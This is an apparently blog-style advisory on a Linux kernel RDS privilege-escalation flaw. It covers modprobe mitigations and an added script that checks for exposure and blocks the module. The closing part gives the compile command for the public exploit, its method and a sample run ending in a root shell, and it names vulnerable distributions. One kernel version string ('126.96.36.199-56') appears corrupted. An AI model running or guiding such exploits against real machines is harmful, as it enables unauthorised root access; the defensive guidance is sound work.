A new security flaw has been discovered in the Linux kernel, specifically in the implementation of the Reliable Datagram Sockets (RDS) protocol. The RDS code copied data to and from user-supplied addresses without checking that those addresses actually lay in user space, so an unprivileged local user can write chosen values into kernel memory; a public exploit uses this to become root on the machine. The vulnerability affects kernels from 2.6.30 up to and including 2.6.36-rc8, and therefore every distribution that ships one of those kernels.
To counter this attack, either upgrade your kernel or keep the RDS module from ever being loaded. RDS is not loaded by default: the kernel autoloads it the first time a process opens a socket in protocol family 21 (PF_RDS), and that autoload is what the following modprobe alias blocks:
echo "alias net-pf-21 off" > /etc/modprobe.d/disable-rds.conf
Two caveats. Current versions of module-init-tools only read files in /etc/modprobe.d whose name ends in .conf, so the file must be named disable-rds.conf rather than disable-rds, otherwise the rule is silently ignored. And the alias only prevents future loads: if rds is already loaded (check /proc/modules), unload it with rmmod rds as well, and a kernel with RDS compiled in rather than built as a module cannot be protected this way at all and must be upgraded.
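As an added example (this script is mine, not code from the post or from the exploit's author), the following sh script checks whether the running kernel is in the affected range, reports how the rds module is reachable on the system, and installs the modprobe rule with the .conf file name that current module-init-tools requires. It uses "install rds /bin/true" instead of the alias above, which neutralises the same PF_RDS autoload; the file name disable-rds.conf and the check/apply subcommands are my own choices.

```shell
#!/bin/sh
# Added example, not part of the original post. Usage:
#   sh rds-check.sh check    report kernel version and rds module state
#   sh rds-check.sh apply    write the modprobe rule and unload rds (as root)
set -u

# Return 0 when a kernel release string falls in the range the post names:
# 2.6.30 up to and including 2.6.36-rc8 (2.6.36 final carries the fix).
# Distribution suffixes such as "-22-generic-pae" are ignored on purpose.
# A distro kernel that backported the fix without changing its version is
# still reported as affected, so treat "affected" as "go and verify".
kernel_in_affected_range() {
    case "$1" in
        2.6.3[0-5]*) return 0 ;;   # 2.6.30 .. 2.6.35.x and distro builds of them
        2.6.36-rc*)  return 0 ;;   # release candidates before the fix landed
        *)           return 1 ;;
    esac
}

# How rds can reach the running kernel:
#   builtin    compiled in, modprobe rules cannot help, upgrade instead
#   loaded     currently loaded, must be rmmod'ed as well as blacklisted
#   available  shipped as a module, autoloads on socket(PF_RDS, ...)
#   absent     not shipped with this kernel
rds_module_state() {
    moddir="/lib/modules/$(uname -r)"
    if grep -q '/rds\.ko' "$moddir/modules.builtin" 2>/dev/null; then
        echo builtin
    elif grep -q '^rds ' /proc/modules 2>/dev/null; then
        echo loaded
    elif grep -q '/rds\.ko' "$moddir/modules.dep" 2>/dev/null; then
        echo available
    else
        echo absent
    fi
}

# The rule to install. modprobe resolves the kernel's request_module("net-pf-21")
# to the module name rds through modules.alias and then runs /bin/true instead
# of loading it, so this covers the same autoload path as "alias net-pf-21 off".
rds_blacklist_rule() {
    printf 'install rds /bin/true\n'
}

# Write the rule into a modprobe.d directory (default /etc/modprobe.d) under a
# .conf name; module-init-tools 3.7 and later ignore files without the suffix.
# Prints the path written.
write_rds_blacklist() {
    dir=${1:-/etc/modprobe.d}
    rds_blacklist_rule > "$dir/disable-rds.conf" && echo "$dir/disable-rds.conf"
}

case "${1:-}" in
    check)
        rel=$(uname -r)
        if kernel_in_affected_range "$rel"; then
            echo "kernel $rel is in the affected range; rds module is $(rds_module_state)"
        else
            echo "kernel $rel is outside the affected range"
        fi
        ;;
    apply)
        if [ "$(rds_module_state)" = builtin ]; then
            echo "rds is built into this kernel; upgrade instead" >&2
            exit 1
        fi
        write_rds_blacklist              # block future loads first ...
        if [ "$(rds_module_state)" = loaded ]; then
            rmmod rds                    # ... then drop the one already in memory
        fi
        ;;
esac
```

The version test is deliberately a plain glob on the upstream number, so use it as a first screen and confirm against your vendor's advisory before deciding a machine is safe; the module-state report is the part that tells you whether the modprobe rule alone is enough.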
The exploit is a single C file. Compile it with:
gcc -o linux-rds-exploit linux-rds-exploit.c
Running the resulting binary as an ordinary user resolves the kernel symbols it needs, overwrites the RDS ioctl function pointer so that it calls commit_creds(prepare_kernel_cred(0)), triggers it, restores the pointer, and drops into a root shell. The output looks like this:
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xf7d2e518
[+] Resolved rds_ioctl to 0xf7d29000
[+] Resolved commit_creds to 0xc0450a6f
[+] Resolved prepare_kernel_cred to 0xc045097a
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Got root!
uid=0(root) gid=0(root) groups=0(root)
I noticed that the exploit works perfectly on Fedora 13 (kernel 126.96.36.199-56) and Ubuntu 10.10 (kernel 2.6.35-22-generic-pae). However, it does not work on Red Hat and CentOS, whose kernel is currently version 2.6.18.
For once, it was Linus Torvalds himself who took charge of the problem and proposed a fix very quickly.